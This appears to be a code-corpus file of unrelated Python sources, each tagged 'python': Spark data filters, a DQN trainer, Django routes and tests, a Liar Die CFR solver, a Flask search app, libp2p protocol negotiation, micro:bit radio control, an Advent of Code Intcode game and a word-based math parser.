from typing import List from typing import Union from pyspark.sql import DataFrame from pyspark.sql import functions as F from pyspark.sql.window import Window def filter_all_not_null(df: DataFrame, reference_columns: List[str]) -> DataFrame: """ Filter rows which have NULL values in all the specified columns. From households_aggregate_processes.xlsx, filter number 2. Parameters ---------- df reference_columns Columns to check for missing values in, all must be missing for the record to be dropped. """ return df.na.drop(how="all", subset=reference_columns) def filter_duplicates_by_time_and_threshold( df: DataFrame, first_reference_column: str, second_reference_column: str, third_reference_column: str, fourth_reference_column: str, time_threshold: float = 1.5, float_threshold: float = 0.00001, ) -> DataFrame: """ Drop duplicates based on two identitical column values if third and fourth column and not both within a threshold difference from the first duplicate record. From households_aggregate_processes.xlsx, filter number 4. Parameters ---------- df first_reference_column First column with duplicate value second_reference_column Second column with duplicate value third_reference_column Column used for time based threshold difference, timestamp fourth_reference_column Column used for numeric based threshold difference, float """ window = Window.partitionBy(first_reference_column, second_reference_column).orderBy(third_reference_column) df = df.withColumn("duplicate_id", F.row_number().over(window)) df = df.withColumn( "within_time_threshold", ( F.abs( F.first(third_reference_column).over(window).cast("long") - F.col(third_reference_column).cast("long") ) / (60 * 60) ) < time_threshold, ) df = df.withColumn( "within_float_threshold", F.abs(F.first(fourth_reference_column).over(window) - F.col(fourth_reference_column)) < float_threshold, ) df = df.filter((F.col("duplicate_id") == 1) | ~(F.col("within_time_threshold") & (F.col("within_float_threshold")))) return df.drop("duplicate_id", "within_time_threshold", "within_float_threshold") def filter_by_cq_diff( df: DataFrame, comparing_column: str, ordering_column: str, tolerance: float = 0.00001 ) -> DataFrame: """ This function works out what columns have a float value difference less than 10-^5 or 0.00001 (or any other tolerance value inputed) given all the other columns are the same and considers it to be the same dropping or deleting the repeated values and only keeping one entry. Parameters ---------- df comparing_column ordering_column tolerance """ column_list = df.columns column_list.remove(comparing_column) windowSpec = Window.partitionBy(column_list).orderBy(ordering_column) df = df.withColumn("first_value_in_duplicates", F.first(comparing_column).over(windowSpec)) df = df.withColumn( "duplicates_first_record", F.abs(F.col("first_value_in_duplicates") - F.col(comparing_column)) < tolerance ) difference_window = Window.partitionBy(column_list + ["duplicates_first_record"]).orderBy(ordering_column) df = df.withColumn("duplicate_number", F.row_number().over(difference_window)) df = df.filter(~(F.col("duplicates_first_record") & (F.col("duplicate_number") != 1))) df = df.drop("first_value_in_duplicates", "duplicates_first_record", "duplicate_number") return df def assign_date_interval_and_flag( df: DataFrame, column_name_inside_interval: str, column_name_time_interval: str, start_datetime_reference_column: str, end_datetime_reference_column: str, lower_interval: Union[int, float], upper_interval: Union[int, float], interval_format: str = "hours", ) -> DataFrame: """ This function gives the time interval in either hours (by default) or days in a column by given two date columns and says whether it is inside and upper and lower interval. If the difference of dates is within the upper and lower time intervals, the function will output None and an integer 1 if the difference in dates are outside of those intervals. Parameters ---------- df column_name_inside_interval Name of the column that returns whether the difference in dates are within the upper/lower limits if within, it will return None, if outside will return an integer 1. column_name_time_interval Name of the column that returns the difference between start and end date and adds at the end of the column name whether it is in hours or days start_datetime_reference_column Earliest date in string format yyyy-mm-dd hh:mm:ss. end_datetime_reference_column Latest date in string format yyyy-mm-dd hh:mm:ss. lower_interval Marks how much NEGATIVE time difference can have between end_datetime_reference_column and start_datetime_reference_column. Meaning how the end_datetime_reference_column can be earlier than start_datetime_reference_column upper_interval Marks how much POSITIVE time difference can have between end_datetime_reference_column and start_datetime_reference_column interval_format By default will be a string called 'hours' if upper and lower intervals are input as days, define interval_format to 'days'. These are the only two possible formats. Notes ----- Lower_interval should be a negative value if start_datetime_reference_column is after end_datetime_reference_column.""" # by default, Hours but if days, apply change factor if interval_format == "hours": # to convert hours to seconds conversion_factor = 3600 # 1h has 60s*60min seconds = 3600 seconds elif interval_format == "days": conversion_factor = 86400 # 1 day has 60s*60min*24h seconds = 86400 seconds column_name_time_interval = column_name_time_interval + "_" + interval_format # FORMULA: (end_datetime_reference_column - start_datetime_reference_column) in # seconds/conversion_factor in seconds df = df.withColumn( column_name_time_interval, ( F.to_timestamp(F.col(end_datetime_reference_column)).cast("long") - F.to_timestamp(F.col(start_datetime_reference_column)).cast("long") ) / conversion_factor, # 1 day has 60s*60min*24h seconds = 86400 seconds ) return df.withColumn( column_name_inside_interval, F.when(~F.col(column_name_time_interval).between(lower_interval, upper_interval), 1).otherwise(None), ) def file_exclude(df: DataFrame, source_file_col: str, files_to_exclude: list): """ Function to exclude specific files from pipeline processing Parameters -------- df source_file_column = Column in input dataframe which contains the source file files_to_exclude = List of files to exclude (feed in from config) """ for item in files_to_exclude: df = df.filter(~F.col(source_file_col).isin(item)) return df
python
from __future__ import absolute_import from builtins import object import numpy as np import logging from relaax.common import profiling from relaax.server.common import session from relaax.common.algorithms.lib import utils from relaax.common.algorithms.lib import observation from .. import dqn_config from .. import dqn_model from . import dqn_utils logger = logging.getLogger(__name__) profiler = profiling.get_profiler(__name__) class Trainer(object): def __init__(self, parameter_server, metrics, exploit): self.ps = parameter_server self.metrics = metrics self._exploit = exploit self.session = session.Session(dqn_model.AgentModel()) self.session.op_initialize() self.replay_buffer = dqn_utils.ReplayBuffer(dqn_config.config.replay_buffer_size, dqn_config.config.alpha) self.observation = observation.Observation(dqn_config.config.input.history) self.last_action = None self.local_step = 0 self.last_target_weights_update = 0 self.agent_weights_id = 0 @profiler.wrap def begin(self): self.get_action() @profiler.wrap def step(self, reward, state, terminal): self.local_step += 1 if self.local_step % dqn_config.config.update_target_weights_interval == 0: self.session.op_update_target_weights() self.receive_experience() if self.local_step > dqn_config.config.start_sample_step: self.update() if reward is not None: self.ps.session.op_add_rewards_to_model_score_routine(reward_sum=reward, reward_weight=1) # metrics if state is not None: self.metrics.histogram('state', state) if reward is None: self.observation.add_state(state) else: self.push_experience(reward, state, terminal) if terminal: self.observation.add_state(None) assert self.last_action is None self.get_action() @profiler.wrap def update(self): experience = self.replay_buffer.sample(dqn_config.config.batch_size) self.send_experience(experience) @profiler.wrap def send_experience(self, experience): batch = dict(zip(experience[0], zip(*[d.values() for d in experience]))) q_next_target = self.session.op_get_q_target_value(next_state=batch["next_state"]) q_next = self.session.op_get_q_value(state=batch["next_state"]) feeds = dict(state=batch["state"], reward=batch["reward"], action=batch["action"], terminal=batch["terminal"], q_next_target=q_next_target, q_next=q_next) gradients = self.session.op_compute_gradients(**feeds) for i, g in enumerate(utils.Utils.flatten(gradients)): self.metrics.histogram('gradients_%d' % i, g) self.ps.session.op_submit_gradients(gradients=gradients, step_inc=1, agent_step=self.agent_weights_id) @profiler.wrap def receive_experience(self): weights, self.agent_weights_id = self.ps.session.op_get_weights_signed() self.session.op_assign_weights(weights=weights) def push_experience(self, reward, state, terminal): assert not self.observation.is_none() assert self.last_action is not None old_state = self.observation.get_state() if state is not None: self.observation.add_state(state) if dqn_config.config.output.q_values: action = np.squeeze(np.argmax(self.last_action)).astype(np.int32) else: action = self.last_action self.replay_buffer.append(dict(state=old_state, action=action, reward=reward, terminal=terminal, next_state=self.observation.get_state())) self.last_action = None def get_action(self): if self.observation.is_none(): self.last_action = None else: q_value = self.session.op_get_q_value(state=[self.observation.get_state()]) self.last_action = self.session.op_get_action(local_step=self.local_step, q_value=q_value) assert self.last_action is not None # metrics self.metrics.histogram('action', self.last_action)
python
__all__ = [ "__version__", "spotify_app", "SpotifyAuth", "SpotifyClient", "SpotifyResponse", ] from .aiohttp_spotify_version import __version__ from .api import SpotifyAuth, SpotifyClient, SpotifyResponse from .app import spotify_app __uri__ = "https://github.com/dfm/aiohttp_spotify" __author__ = "Daniel Foreman-Mackey" __email__ = "[email protected]" __license__ = "MIT" __description__ = "An async Python interface to the Spotify API using aiohttp"
python
from . import views from rest_framework.routers import SimpleRouter from django.urls import path router = SimpleRouter() router.register("posts", views.PostViewSet, "posts") urlpatterns = [ path('upload_file/', views.FileUploadView.as_view()), ] urlpatterns += router.urls
python
import getpass message = 'hello {}'.format(getpass.getuser())
python
from django.core.urlresolvers import resolve from django.urls import reverse from django.template.loader import render_to_string from django.test import TestCase from django.http import HttpRequest from unittest import skip from users.views import home_visitor, display_signup from users.models import University, Faculty, Department from users.forms import SignupForm, UserSignUpForm from django.contrib.auth.models import User class signup_form_test(TestCase): def test_user_submits_valid_form(self): # Setup test u = User() u.username = 'waaaaeeel' u.email = '[email protected]' data = {'username':u.username, 'email':u.email, 'password':'12345678abc', 'password_confirm':'12345678abc'} # Exercise test form = UserSignUpForm(data=data) # Assert test self.assertTrue(form.is_valid()) def test_users_submits_invalid_username(self): # Setup test u = User() u.username = '123' u.email = '[email protected]' data = {'username':u.username, 'email':u.email, 'password':'12345678abc', 'password_confirm':'12345678abc'} # Exercise test form = UserSignUpForm(data=data) # Assert test self.assertFalse(form.is_valid()) def test_users_submits_arabic_username(self): # Setup test u = User() u.username = 'فارس' u.email = '[email protected]' data = {'username':u.username, 'email':u.email, 'password':'12345678abc', 'password_confirm':'12345678abc'} # Exercise test form = UserSignUpForm(data=data) # Assert test self.assertTrue(form.is_valid()) def test_users_submits_arabic_username_with_extended_letters(self): # Setup test u = User() u.username = 'فارس_الإسلام' u.email = '[email protected]' data = {'username':u.username, 'email':u.email, 'password':'12345678abc', 'password_confirm':'12345678abc'} # Exercise test form = UserSignUpForm(data=data) # Assert test print(form.errors) self.assertTrue(form.is_valid()) def test_users_submits_unmatched_password(self): # Setup test u = User() u.username = 'iige13' u.email = '[email protected]' data = {'username':u.username, 'email':u.email, 'password':'12345678abc', 'password_confirm':'12345678bca'} # Exercise test form = UserSignUpForm(data=data) # Assert test self.assertFalse(form.is_valid()) # Causes keyError exception because of the front-end validation that password should be 7 digits. def test_password_strength(self): # Setup test u = User() u.username = 'ibham' u.email = '[email protected]' data = {'username':u.username, 'email':u.email, 'password':'555', 'password_confirm':'555'} # Exercise test form = UserSignUpForm(data=data) # Assert test self.assertFalse(form.is_valid()) def test_password_with_only_digits(self): # Setup test u = User() u.username = 'ibham' u.email = '[email protected]' data = {'username':u.username, 'email':u.email, 'password':'12345678', 'password_confirm':'12345678'} # Exercise test form = UserSignUpForm(data=data) # Assert test self.assertFalse(form.is_valid())
python
#!/usr/bin/env python # -*- encoding: utf-8 -*- ''' @File : LiarDie.py @Time : 2021/11/15 00:08:33 @Author : yanxinyi @Version : v1.0 @Contact : [email protected] @Desc : Applying algorithm of Fixed-Strategy Iteration Counterfactual Regret Minimization (FSICFR) to Liar Die. java code structure: class Node { <Liar Die node definitions> <Liar Die node constructor> <Get Liar Die node current mixed strategy through regret-matching> <Get Liar Die node average mixed strategy> } public void train(int iterations) { double[] regret = new double[sides]; int[] rollAfterAcceptingClaim = new int[sides]; for (int iter = 0; iter < iterations; iter++) { <Initialize rolls and starting probabilities> <Accumulate realization weights forward> <Backpropagate utilities, adjusting regrets and strategies> <Reset strategy sums after half of training> } <Print resulting strategy> } public class LiarDieTrainer { <Liar Die definitions> <Liar Die player decision node> <Construct trainer and allocate player decision nodes> <Train with FSICFR> <LiarDieTrainer main method> } ''' import random class Node(object): '''Liar Die player decision node''' def __init__(self, numActions, *args, **kwargs): '''Liar Die node definitions''' self.regretSum = [0] * numActions self.strategy = [0] * numActions self.strategySum = [0] * numActions self.u = 0 self.pPlayer = 0 self.pOpponent = 0 def getStrategy(self): '''Get Liar Die node current mixed strategy through regret-matching''' normalizingSum = 0 for i in range(len(self.strategy)): self.strategy[i] = max(self.regretSum[i], 0) normalizingSum += self.strategy[i] for i in range(len(self.strategy)): if normalizingSum > 0: self.strategy[i] /= normalizingSum else: self.strategy[i] = 1/len(self.strategy) for i in range(len(self.strategy)): self.strategySum[i] += self.pPlayer * self.strategy[i] return self.strategy def getAverageStrategy(self): '''Get Liar Die node average mixed strategy''' normalizingSum = 0 for i in range(len(self.strategySum)): normalizingSum += self.strategySum[i] for i in range(len(self.strategySum)): if normalizingSum > 0: self.strategySum[i] /= normalizingSum else: self.strategySum[i] = 1 / len(self.strategySum) return self.strategySum class LDTrainer(object): def __init__(self, seed=None, sides=6, *args, **kwargs): random.seed(seed) '''Liar Die definitions''' self.DOUBT = 0 self.ACCEPT = 1 # Construct trainer and allocate player decision nodes self.sides = sides self.responseNodes = [[0]*(self.sides + 1) for _ in range(self.sides)] self.claimNodes = [[0]*(self.sides + 1) for _ in range(self.sides)] for myClaim in range(self.sides + 1): for oppClaim in range(myClaim + 1, self.sides + 1): self.responseNodes[myClaim][oppClaim] = \ Node(1 if (oppClaim == 0 or oppClaim == self.sides) else 2) for oppClaim in range(self.sides): for roll in range(1, self.sides + 1): self.claimNodes[oppClaim][roll] = Node(self.sides - oppClaim) def train(self, iterations): '''Train with FSICFR''' regret = [0] * self.sides rollAfterAcceptingClaim = [0] * self.sides for iter in range(iterations): # Initialize rolls and starting probabilities for i in range(len(rollAfterAcceptingClaim)): rollAfterAcceptingClaim[i] = random.randint(0, self.sides - 1) + 1 self.claimNodes[0][rollAfterAcceptingClaim[0]].pPlayer = 1 self.claimNodes[0][rollAfterAcceptingClaim[0]].pOpponent = 1 # Accumulate realization weights forward for oppClaim in range(0, self.sides + 1): # Visit response Nodes forward if oppClaim > 0: for myClaim in range(0, oppClaim): node = self.responseNodes[myClaim][oppClaim] actionProb = node.getStrategy() if oppClaim < self.sides: nextNode = self.claimNodes[oppClaim][rollAfterAcceptingClaim[oppClaim]] nextNode.pPlayer += actionProb[1] * node.pPlayer nextNode.pOpponent += node.pOpponent # Visit claim nodes forward if oppClaim < self.sides: node = self.claimNodes[oppClaim][rollAfterAcceptingClaim[oppClaim]] actionProb = node.getStrategy() for myClaim in range(oppClaim + 1, self.sides + 1): nextClaimProb = actionProb[myClaim - oppClaim - 1] if nextClaimProb > 0: nextNode = self.responseNodes[oppClaim][myClaim] nextNode.pPlayer += node.pOpponent nextNode.pOpponent += nextClaimProb * node.pPlayer # Backpropagate utilities, adjusting regrets and strategies for oppClaim in range(self.sides, -1, -1): # Visit claim nodes backward if oppClaim < self.sides: node = self.claimNodes[oppClaim][rollAfterAcceptingClaim[oppClaim]] actionProb = node.strategy node.u = 0 for myClaim in range(oppClaim + 1, self.sides + 1): actionIndex = myClaim - oppClaim - 1 nextNode = self.responseNodes[oppClaim][myClaim] childUtil = - nextNode.u regret[actionIndex] = childUtil node.u += actionProb[actionIndex] * childUtil for a in range(len(actionProb)): regret[a] -= node.u node.regretSum[a] += node.pOpponent * regret[a] node.pPlayer = node.pOpponent = 0 # Visit response nodes backward if oppClaim > 0: for myClaim in range(0, oppClaim): node = self.responseNodes[myClaim][oppClaim] actionProb = node.strategy node.u = 0 doubtUtil = 1 if (oppClaim > rollAfterAcceptingClaim[myClaim]) else -1 regret[self.DOUBT] = doubtUtil if oppClaim < self.sides: nextNode = self.claimNodes[oppClaim][rollAfterAcceptingClaim[oppClaim]] regret[self.ACCEPT] = nextNode.u node.u += actionProb[self.ACCEPT] * nextNode.u for a in range(len(actionProb)): regret[a] -= node.u node.regretSum[a] += node.pOpponent * regret[a] node.pPlayer = node.pOpponent = 0 # Reset strategy sums after half of training if iter == iterations / 2: for nodes in self.responseNodes: for node in nodes: if node: for a in range(len(node.strategySum)): node.strategySum[a] = 0 for nodes in self.claimNodes: for node in nodes: if node: for a in range(len(node.strategySum)): node.strategySum[a] = 0 # Print resulting strategy for initialRoll in range(1, self.sides + 1): print("Initial claim policy with roll {0:d}: ".format(initialRoll), end = '') for prob in self.claimNodes[0][initialRoll].getAverageStrategy(): print('{0:.2f} '.format(prob), end = '') print('') print('\nOld_Claim\tNew_Claim\tAction_Probabilities') for myClaim in range(0, self.sides + 1): for oppClaim in range(myClaim + 1, self.sides + 1): print('{0:d}\t{1:d}\t'.format(myClaim, oppClaim) + \ str([float('%.4g' % float('%.3f' % x)) for x in \ self.responseNodes[myClaim][oppClaim].getAverageStrategy()])) print('\nOld_Claim\tRoll\tAction_Probabilities') for oppClaim in range(0, self.sides): for roll in range(1, self.sides + 1): print('{0:d}\t{1:d}\t'.format(oppClaim, roll) + \ str([float('%.3g' % float('%.2f' % x)) for x in \ self.claimNodes[oppClaim][roll].getAverageStrategy()])) # print('regrets', self.claimNodes[oppClaim][roll].regretSum) if __name__ == "__main__": LD = LDTrainer(seed=1, sides=6) LD.train(iterations = 10000)
python
import numpy as np import pandas as pd import pickle from sklearn.neighbors import NearestNeighbors from flask import Flask, render_template, request, redirect, jsonify """ To run on windows with powershell: 1. Navigate to the directory where apsapp.py is located. 2. Enter: $env:FLASK_APP = "apsapp.py" 3. Enter: python -m flask run 4. Open browser and go to specififed url (probably http://127.0.0.1:5000/) """ # =================================================== # Load required files. # =================================================== vectorizerFile = "tfidf_test.pickle" #This file holds the vectorizer eventsFile = "events_test.pickle" #This file holds a dataframe of events nnFile = "nearestneighbors_test.pickle" #This file holds a the nearest neighbor information tMatrixFile = "T_test.pckle" #holds the T matrix from the SVD nnSVDFile = "nearestneighborsSVD_test.pickle" #holds the NN map of the D matrix from the SVD with open(vectorizerFile, 'rb') as f: v = pickle.load(f) with open(eventsFile, 'rb') as f: events = pickle.load(f) with open(nnFile, 'rb') as f: nn = pickle.load(f) with open(tMatrixFile, 'rb') as f: T = pickle.load(f) with open(nnSVDFile, 'rb') as f: nnSVD = pickle.load(f) #Converts an event index to a dictionary with four entries: # title -> The title of the abstract # abstract -> A shortened version of the abstract # link -> URL of the event # score -> Relative score of the event def index_to_event(index, score,abstractLength=100): """Get an event associated with a given index.""" e = events.iloc[index] session = e['session'] event = e['event'] year = e['year'] return { 'session' : session, 'event' : str(event), 'title': e['title'], 'abstract': e['abstract'][:abstractLength]+"...", 'score': str(score), 'link': f'https://meetings.aps.org/Meeting/MAR{year[-2:]}' f'/Session/{session}.{event}' } def castQueryIntoTruncatedSubspace(matrix, T): """ An existing SVD can be applied to a new query be performing q' = T'^T q where q' and T' are truncated matrcies and q is a on column document term matrix. Input: document is a dense(?) numerical matrix T is numerical matricies. returns a one column vector . """ return np.dot(np.transpose(T),np.transpose(matrix)) # =================================================== # Define the app # =================================================== app = Flask(__name__) # Front page for the site; simply render the submission form @app.route('/') def home(): return render_template('index.html') # Show search results @app.route('/process', methods=['POST']) def results(): #Get the body body = request.json if request.json else request.form['abstr'] #Number of requested results num_results = 25 #Project the text onto the vector space input=v.transform([body]) truncatedInput = np.transpose(castQueryIntoTruncatedSubspace(input.todense(), T)) #Get the results (distSVD,indicesSVD)=nnSVD.kneighbors(truncatedInput, n_neighbors=num_results, return_distance=True) resultsSVD = [] for i, d in zip(indicesSVD[0], distSVD[0]): resultsSVD.append(index_to_event(i, round(1-d,3))) return render_template('results.html', resultsSVD=resultsSVD, num_resultsSVD=num_results) if __name__ == '__main__': app.run()
python
class RLEIterator: def __init__(self, A: List[int]): def next(self, n: int) -> int: # Your RLEIterator object will be instantiated and called as such: # obj = RLEIterator(A) # param_1 = obj.next(n)
python
# 입력으로 하나씩 받아서 아이디랑 이름이랑 매치시키자. import collections def solution(record) : result = collections.defaultdict(str) for rec in record : _, uid, name = rec.split(' ') result[uid] = name print(result) answer = [] return answer answer =solution(["Enter uid1234 Muzi", "Enter uid4567 Prodo","Leave uid1234","Enter uid1234 Prodo","Change uid4567 Ryan"]) print(answer)
python
from typing import Dict, Tuple from libp2p.typing import StreamHandlerFn, TProtocol from .exceptions import MultiselectCommunicatorError, MultiselectError from .multiselect_communicator_interface import IMultiselectCommunicator from .multiselect_muxer_interface import IMultiselectMuxer MULTISELECT_PROTOCOL_ID = "/multistream/1.0.0" PROTOCOL_NOT_FOUND_MSG = "na" class Multiselect(IMultiselectMuxer): """ Multiselect module that is responsible for responding to a multiselect client and deciding on a specific protocol and handler pair to use for communication """ handlers: Dict[TProtocol, StreamHandlerFn] def __init__( self, default_handlers: Dict[TProtocol, StreamHandlerFn] = None ) -> None: if not default_handlers: default_handlers = {} self.handlers = default_handlers def add_handler(self, protocol: TProtocol, handler: StreamHandlerFn) -> None: """ Store the handler with the given protocol :param protocol: protocol name :param handler: handler function """ self.handlers[protocol] = handler async def negotiate( self, communicator: IMultiselectCommunicator ) -> Tuple[TProtocol, StreamHandlerFn]: """ Negotiate performs protocol selection :param stream: stream to negotiate on :return: selected protocol name, handler function :raise MultiselectError: raised when negotiation failed """ await self.handshake(communicator) while True: try: command = await communicator.read() except MultiselectCommunicatorError as error: raise MultiselectError(error) if command == "ls": # TODO: handle ls command pass else: protocol = TProtocol(command) if protocol in self.handlers: try: await communicator.write(protocol) except MultiselectCommunicatorError as error: raise MultiselectError(error) return protocol, self.handlers[protocol] try: await communicator.write(PROTOCOL_NOT_FOUND_MSG) except MultiselectCommunicatorError as error: raise MultiselectError(error) async def handshake(self, communicator: IMultiselectCommunicator) -> None: """ Perform handshake to agree on multiselect protocol :param communicator: communicator to use :raise MultiselectError: raised when handshake failed """ try: await communicator.write(MULTISELECT_PROTOCOL_ID) except MultiselectCommunicatorError as error: raise MultiselectError(error) try: handshake_contents = await communicator.read() except MultiselectCommunicatorError as error: raise MultiselectError(error) if not is_valid_handshake(handshake_contents): raise MultiselectError( "multiselect protocol ID mismatch: " f"received handshake_contents={handshake_contents}" ) def is_valid_handshake(handshake_contents: str) -> bool: """ Determine if handshake is valid and should be confirmed :param handshake_contents: contents of handshake message :return: true if handshake is complete, false otherwise """ return handshake_contents == MULTISELECT_PROTOCOL_ID
python
# bbc micro:bit + bit:commander (4tronix) # use joystick to command robot kitronik :move from microbit import * import radio # setup radio.on() #radio.config(group=0) s_forward, s_right = 0, 0 # main loop while True: # read joystick and scale it # -100 is full reverse forward / 0 is stop / +100% is full forward forward = round(200 * pin2.read_analog()/1023) - 100 right = round(200 * pin1.read_analog()/1023) - 100 # add a cutoff if abs(forward) < 20: forward = 0 if abs(right) < 20: right = 0 # send values on change if (s_forward, s_right) != (forward, right): (s_forward, s_right) = (forward, right) print("forward=%s right=%s" % (forward, right)) radio.send("%i,%i" % (forward, right)) # red button send stop command if pin12.read_digital(): radio.send("0,0") sleep(50)
python
# Generated by Django 3.2 on 2021-05-19 04:25 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('Sentiment', '0003_auto_20210517_1332'), ] operations = [ migrations.CreateModel( name='CSVResult', fields=[ ('id', models.AutoField(primary_key=True, serialize=False)), ('dataframe', models.JSONField()), ('name', models.CharField(max_length=500)), ('file_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Sentiment.document')), ], ), ]
python
from collections import defaultdict from aocd import data from p09 import Boost class Cabinet(Boost): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.screen = defaultdict(int) self.x = None self.y = None self.score = None self.ball_x = 0 self.paddle_x = 0 def execute(self): while (code := self._get_op_code()).value != 99: arg1, arg2, arg3 = self._get_args(code) op = self._get_op(code.op) if code.op == 3: if self.paddle_x < self.ball_x: op(arg1, 1) elif self.paddle_x > self.ball_x: op(arg1, -1) else: op(arg1, 0) elif code.op == 4: self.pointer += 2 if self.x is None: self.x = arg1.value elif self.y is None: self.y = arg1.value else: if self.x == -1 and self.y == 0: self.score = arg1.value else: point = (self.x, self.y) self.screen[point] = arg1.value if arg1.value == 4: self.ball_x = self.x elif arg1.value == 3: self.paddle_x = self.x self.x = None self.y = None else: op(arg1, arg2, arg3, None) if __name__ == '__main__': program = [code for code in data.split(',')] + ['0']*10000 cabinet = Cabinet(program) cabinet.execute() block_tiles = sum(tile == 2 for tile in cabinet.screen.values()) print('Part 1:', block_tiles) # infinite money cheat code program[0] = '2' cabinet = Cabinet(program) cabinet.execute() print('Part 2:', cabinet.score)
python
rna_trans = {'G':'C', 'C':'G', 'T':'A', 'A':'U'} def to_rna(dna): rna = '' for n in dna: if n not in rna_trans: return '' rna += rna_trans[n] return rna
python
#!/usr/bin/env python2.7 """Facilitates the measurement of current network bandwidth.""" import collections class Bandwidth(object): """Object containing the current bandwidth estimation.""" def __init__(self): self._current = 0 self._previous = 0 self._trend = collections.deque(maxlen=100) def change(self, bandwidth): """ Change the current bandwidth estimation. Also records a bandwidth trend (1 for increasing, 0 for the same and -1 for decreasing). """ self._previous = self._current self._current = bandwidth if self._current > self._previous: self._trend.append(1) elif self._current == self._previous: self._trend.append(0) elif self._current < self._previous: self._trend.append(-1) def historical_trend(self): """Return the historical trend in bandwidth.""" return list(self._trend) def __str__(self): """Returns the current estimated bandwidth.""" return str(self._current) def __int__(self): """Returns the current estimated bandwidth.""" return int(self._current)
python
import gmsh # init gmsh gmsh.initialize() gmsh.option.setNumber("General.Terminal", 1) gfile="03032015J_H2-HR.brep" volumes = gmsh.model.occ.importShapes(gfile) gmsh.model.occ.synchronize() print(volumes) pgrp = gmsh.model.addPhysicalGroup(3, [1]) gmsh.model.setPhysicalName(2, pgrp, "Cu") """ gmsh.model.mesh.setSize(gmsh.model.getEntities(0), 2) gmsh.option.setNumber("Mesh.Algorithm", 5) gmsh.model.mesh.generate(3) gmsh.write("test.msh") """ gmsh.finalize()
python
from __future__ import division import re from math import sqrt, sin, cos, log, tan, acos, asin, atan, e, pi from operator import truediv as div from operator import add, sub, mul, pow from .numbers import NumberService class MathService(object): __constants__ = { 'e': e, 'E': e, 'EE': e, 'pi': pi, 'pie': pi } __unaryOperators__ = { 'log': log, 'sine': sin, 'sin': sin, 'cosine': cos, 'cos': cos, 'tan': tan, 'tangent': tan, 'arcsine': asin, 'arcsin': asin, 'asin': asin, 'arccosine': acos, 'arccos': acos, 'acos': acos, 'arctanget': atan, 'arctan': atan, 'atan': atan, 'sqrt': sqrt } __binaryOperators__ = { 'plus': add, 'add': add, 'sum': add, 'minus': sub, 'sub': sub, 'subtract': sub, 'less': sub, 'over': div, 'divide': div, 'times': mul, 'multiply': mul, 'to': pow } @staticmethod def _applyBinary(a, b, op): a = float(a) b = float(b) return op(a, b) @staticmethod def _applyUnary(a, op): a = float(a) return op(a) @staticmethod def _preprocess(inp): """Revise wording to match canonical and expected forms.""" inp = re.sub(r'(\b)a(\b)', r'\g<1>one\g<2>', inp) inp = re.sub(r'to the (.*) power', r'to \g<1>', inp) inp = re.sub(r'to the (.*?)(\b)', r'to \g<1>\g<2>', inp) inp = re.sub(r'log of', r'log', inp) inp = re.sub(r'(square )?root( of)?', r'sqrt', inp) inp = re.sub(r'squared', r'to two', inp) inp = re.sub(r'cubed', r'to three', inp) inp = re.sub(r'divided?( by)?', r'divide', inp) inp = re.sub(r'(\b)over(\b)', r'\g<1>divide\g<2>', inp) inp = re.sub(r'(\b)EE(\b)', r'\g<1>e\g<2>', inp) inp = re.sub(r'(\b)E(\b)', r'\g<1>e\g<2>', inp) inp = re.sub(r'(\b)pie(\b)', r'\g<1>pi\g<2>', inp) inp = re.sub(r'(\b)PI(\b)', r'\g<1>pi\g<2>', inp) def findImplicitMultiplications(inp): """Replace omitted 'times' references.""" def findConstantMultiplications(inp): split = inp.split(' ') revision = "" converter = NumberService() for i, w in enumerate(split): if i > 0 and w in MathService.__constants__: if converter.isValid(split[i - 1]): revision += " times" if not revision: revision = w else: revision += " " + w return revision def findUnaryMultiplications(inp): split = inp.split(' ') revision = "" for i, w in enumerate(split): if i > 0 and w in MathService.__unaryOperators__: last_op = split[i - 1] binary = last_op in MathService.__binaryOperators__ unary = last_op in MathService.__unaryOperators__ if last_op and not (binary or unary): revision += " times" if not revision: revision = w else: revision += " " + w return revision return findUnaryMultiplications(findConstantMultiplications(inp)) return findImplicitMultiplications(inp) @staticmethod def _calculate(numbers, symbols): """Calculates a final value given a set of numbers and symbols.""" if len(numbers) is 1: return numbers[0] precedence = [[pow], [mul, div], [add, sub]] # Find most important operation for op_group in precedence: for i, op in enumerate(symbols): if op in op_group: # Apply operation a = numbers[i] b = numbers[i + 1] result = MathService._applyBinary(a, b, op) new_numbers = numbers[:i] + [result] + numbers[i + 2:] new_symbols = symbols[:i] + symbols[i + 1:] return MathService._calculate(new_numbers, new_symbols) def parseEquation(self, inp): """Solves the equation specified by the input string. Args: inp (str): An equation, specified in words, containing some combination of numbers, binary, and unary operations. Returns: The floating-point result of carrying out the computation. """ inp = MathService._preprocess(inp) split = inp.split(' ') # Recursive call on unary operators for i, w in enumerate(split): if w in self.__unaryOperators__: op = self.__unaryOperators__[w] # Split equation into halves eq1 = ' '.join(split[:i]) eq2 = ' '.join(split[i + 1:]) # Calculate second half result = MathService._applyUnary(self.parseEquation(eq2), op) return self.parseEquation(eq1 + " " + str(result)) def extractNumbersAndSymbols(inp): numbers = [] symbols = [] # Divide into values (numbers), operators (symbols) next_number = "" for w in inp.split(' '): if w in self.__binaryOperators__: symbols.append(self.__binaryOperators__[w]) if next_number: numbers.append(next_number) next_number = "" else: if next_number: next_number += " " next_number += w if next_number: numbers.append(next_number) # Cast numbers from words to integers def convert(n): if n in self.__constants__: return self.__constants__[n] converter = NumberService() return converter.parse(n) numbers = [convert(n) for n in numbers] return numbers, symbols numbers, symbols = extractNumbersAndSymbols(inp) return MathService._calculate(numbers, symbols) def parseEquation(self, inp): """Solves the equation specified by the input string. This is a convenience method which would only be used if you'd rather not initialize a NumberService object. Args: inp (str): An equation, specified in words, containing some combination of numbers, binary, and unary operations. Returns: The floating-point result of carrying out the computation. """ service = NumberService() return service.parseEquation(inp)
python
